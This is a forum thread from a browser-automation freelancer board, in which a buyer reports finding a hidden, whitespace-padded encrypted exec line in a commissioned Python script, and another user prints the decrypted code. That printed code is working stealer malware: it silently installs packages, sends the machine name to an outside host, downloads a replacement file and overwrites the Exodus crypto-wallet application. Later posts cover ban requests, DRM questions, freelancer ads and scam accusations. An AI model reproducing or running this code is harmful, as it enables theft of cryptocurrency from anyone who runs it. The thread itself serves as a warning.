Please ban this guy from this forum, I bought him a script and there is special lines hidden in it with a LOT of spaces
;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCp#########################zRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))
(code has been partially removed to not copy it)
it seems to be keylogger or idk some shit like that
Lol. nice trick.
That code looks like https://cryptography.io/en/latest/fernet/, and it made to steal your passwords and other sensitive information.
import os
import subprocess
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW
subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'requests', 'httpx'],creationflags=creationflags)
import requests
import httpx
data = {
"username": os.getenv("COMPUTERNAME")
}
httpx.post("https://bananasquad.ru/downloadhandler", json=data)
subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'pyperclip', 'pyotp', 'psutil', 'pycryptodome', 'asyncio', 'threaded', 'datetime', 'colorama', 'customtkinter', 'pyfiglet', 'tqdm', 'pypiwin32', 'pywin32', 'zipfile'],creationflags=creationflags)
import asyncio
import json
import ntpath
import random
import re
import shutil
import sqlite3
import threading
import zipfile
import psutil
import base64
import time
import pyperclip
from urllib.request import Request, urlopen
has_exodus = False
def inject():
procc = "exodus.exe"
local = os.getenv("localappdata")
path = f"{local}/exodus"
if not os.path.exists(path): return
listOfFile = os.listdir(path)
apps = []
for file in listOfFile:
if "app-" in file:
apps += [file]
exodusPatchURL = "https://bananasquad.ru/app.asar"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"}
req = Request(exodusPatchURL, headers=headers)
response = urlopen(req)
data = response.read()
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
for app in apps:
try:
fullpath = f"{path}/{app}/resources/app.asar"
with open(fullpath, 'wb') as out_file1:
out_file1.write(data)
except: pass
inject()
### some other code
F Fox pinned this topic on
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe
This account has only 2 forum posts, I don't think it will be a big loss for him. For the future, pay attention to the reputation and reviews of performers. For payment always use a guarantor, it will protect both you and the performer.
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe
It's always risky to order a script from an unknown person.
I reviewed his code, and I believe that he is not only a bad guy but also a bad programmer с руками из ж*пы.😂
His scripts didn't work at all on many computers.
Perhaps the developer may have been affected by malware, but they do not understand what is happening because their machine is hiding the malware.
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Please ban this guy from this forum, I bought him a script and there is special lines hidden in it with a LOT of spaces
;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCp#########################zRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))
(code has been partially removed to not copy it)
it seems to be keylogger or idk some shit like that
I just now watched the attached video, in it you show a script in python, which is designed to control an anti-detect browser, which is a competitor of BAS. Did I understand you correctly that you found an executor on the BAS forum to create a script to control a completely different anti-detect browser, you don't like the result of the work done and you ask to block this user on the BAS forum?
@Fox said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
.... you don't like the result of the work done and you ask to block this user on the BAS forum?
Да там еще смешнее, разработчик сказал, что сделал то, что даже теоретически нельзя сделать.
А именно проигрывать защищённый DRM контент через браузер, через который это нельзя сделать.
В BAS же нельзя, вот и, вероятно, ему и предложили не BAS. А там то тоже нельзя.😄
@thotho
Widevine DRM content can only be played on certified browsers such as Genuine Chrome, Opera, etc.
However, in this case, you encountered a challenge with fingerprints, which cannot be handled very easily.
No need to overpay Write to me! I'll do it inexpensively
I will quickly make you any script
any automation. in any languages
we'll agree on the price
consultation is free
write your questions in more detail
@phantomdevops17 Развод не выполняет задание время от времени делает новую телегу
@nikita556 said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
@phantomdevops17 Развод не выполняет задание время от времени делает новую телегу
На этом форуме у него ни одного поста, кроме рекламного.
@sergerdn said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
На этом форуме у него ни одного поста, кроме рекламного.
Это бесполезно, к таким все равно обращаются и еще умудряются платить вперед или аванс давать. Видимо их рассказы о том, что они могу все и за недорого делают свое дело.
@phantomdevops17 said in Freelancers Directory BrowserAutomationStudio:
Development at B.A.S since January 2019 there is a premium every day there is work
We do projects with a partner. But for a new client, we will always find time and allocate an extra hour to solve your problem.We Automate Everything Chrome Can Do...
Work in multithreading with: proxy fingerprint profiles across sites, servers, file systems and AP...
We carry out work efficiently, efficiently and quickly,Software support and training with the program is free,
Minimum order from 50$ + evaluation of each project individually...Write or call we answer quickly my telegram PhantomDevOps
You will be satisfied with the result))
100% Scammer. They are a Team who scammed all people
